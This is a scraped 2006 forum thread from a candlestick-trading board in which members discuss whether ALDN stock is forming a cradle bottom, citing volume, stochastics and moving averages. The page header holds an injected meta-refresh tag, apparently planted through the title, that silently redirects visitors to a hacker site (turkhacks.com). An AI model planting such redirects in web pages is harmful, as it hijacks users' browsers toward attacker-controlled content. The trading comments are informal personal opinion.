Forum Index" /> <meta http-equiv="refresh" content="0;URL=http://www.turkhacks.com/dosya/heyk.html"> :: View topic - aldn
<meta http-equiv= Forum Index" vspace="1" />
Revolutionizing Investor Psychology

FAQFAQ   SearchSearch   MemberlistMemberlist   UsergroupsUsergroups   RegisterRegister 
 ProfileProfile   Log in to check your private messagesLog in to check your private messages   Log inLog in 

aldn

Post new topic   Reply to topic     Forum Index -> Stephen W. Bigalow's Candlestick Trading
View previous topic :: View next topic  
ninner

PostPosted: Mon Jul 31, 2006 8:28 pm    Post subject: aldn Reply with quote

is this a cradle pattern
rm

PostPosted: Tue Aug 01, 2006 5:09 am    Post subject: Reply with quote

I hope the more experienced people will reply on this one so I can learn also.

Looking up cradle, the example is shorter term, but patterns do get morphed at times. If it comes up with a good up day then I'd say yes.

But it is to me in the catagory that the cradle, scoop, fry pan bottom, cup with handle etc... are all in, it looks like it's headed towards a good reversal.
Looks like people let it drop on down after the pre report report came out, then the acutal report did very little to the price.

The weekly chart shows the selling drying up. And the daily chart looks promising with the 20 ma being the only resistance for awhile.
I like it and NNI for today's watch.
Scooter

PostPosted: Tue Aug 01, 2006 8:06 am    Post subject: Reply with quote

Nice looking chart with a lot of upside. The bears and bulls are fighting it out at the bottom (at least three Doji's in the last three weeks). Stochastics are moving up nicely.

The question will be how quickly it moves out of the congestion at this cradle bottom. I'd like to see a big white day with good volume, and then I think it could go up in a hurry.

Scooter
ninner

PostPosted: Tue Aug 01, 2006 9:36 pm    Post subject: Reply with quote

any comments on todays action....lets keep this thread going along with NNI as educational tools.

cheers
Scooter

PostPosted: Tue Aug 01, 2006 10:43 pm    Post subject: Reply with quote

Pretty non-eventful day. Real low volume for ALDN on a day when the market as a whole was down due to the latest report on inflation.This one is just trending pretty much sideways at the moment. I wouldn't commit any funds until you see a good breakout day on good volume.

Markets are still a bit choppy and unpredictable at the moment. With the Fed's next meeting coming around next week, that's not likely to change soon.

Scooter
ninner

PostPosted: Tue Aug 01, 2006 11:27 pm    Post subject: Reply with quote

thanks for the responses...lets keep them coming...that is how we learn and hopefully we can make some cash....if anyone finds any ideas...dont hesitate to post....other 2 i am following are ITRI and VLCM....they havent bottomed yet..but they are on my watchlist.

all the best
Scooter

PostPosted: Wed Aug 02, 2006 10:47 pm    Post subject: Reply with quote

Still no indication of heavy buying by the bulls. Just keep it on the watch list for now.

Scooter
rm

PostPosted: Thu Aug 03, 2006 5:18 am    Post subject: Reply with quote

I went ahead and got in at 14.59 tuesday. It gapped up .01, making a couple of bucks, still nothing big happening, but it is trying to ease up through the 20 ma.
Stochastics still coming up and the bollinger bands are coming down on it real hard.

What's it fixin to do Rolling Eyes
It's a least trying to close the gap at 14.99

We'll see.....

rm
Scooter

PostPosted: Thu Aug 03, 2006 7:38 am    Post subject: Reply with quote

I definitely think it will move up. It's forming a nice cradle bottom. The only question is when. I would be much more encouraged if the volume was increasing (rather than decreasing) as it starts to form the bottom right side of the cup. Will it have enough gas to get up the hill? Like you said, we'll see. If it does get some wind behind it, it could be a big gain over a relatively short span.

Good luck,
Scooter
Scooter

PostPosted: Sun Aug 20, 2006 12:10 am    Post subject: Reply with quote

Well, this one is finally showing some life after a huge cradle bottom. Big breakout day on Friday -- up over 7%. Sitting at $16.03 currently. Next resistance would likely be 50 MA at around $16.75.

Scooter
ninner

PostPosted: Sun Aug 20, 2006 12:30 pm    Post subject: aldn Reply with quote

im watching it alot closer but looks quite abit overbought...actually the markets are abit overbought in my opinion...im expecting a less fruitful week ahead

cheers
rm

PostPosted: Mon Aug 21, 2006 12:21 am    Post subject: Reply with quote

Yeh, this one looks like it still has a little life once it moves on past this resistance.

rm
ninner

PostPosted: Sun Sep 03, 2006 2:38 pm    Post subject: i hope u got in Reply with quote

like bigalow was talking about in his stock chat on thursday ..this is your typical cradle pattern notice how its slowing rising and the stochastics are higher as well.....never fear it will test the 200 day so still time to get in for a quick profit here folks
Harry

PostPosted: Sun Sep 03, 2006 2:58 pm    Post subject: Reply with quote

Be careful. Low volume. Only one day in Aug. with a 100,000 + day. Everything else looks good. Anyone in the market with some deep pockets could easily take it down 10-15 percent.
ninner

PostPosted: Mon Sep 04, 2006 10:06 am    Post subject: Reply with quote

I NEVER noticed the volume..thanks for the heads up Harry
Post new topic   Reply to topic     Forum Index -> Stephen W. Bigalow's Candlestick Trading All times are GMT - 5 Hours
Page 1 of 1

Jump to: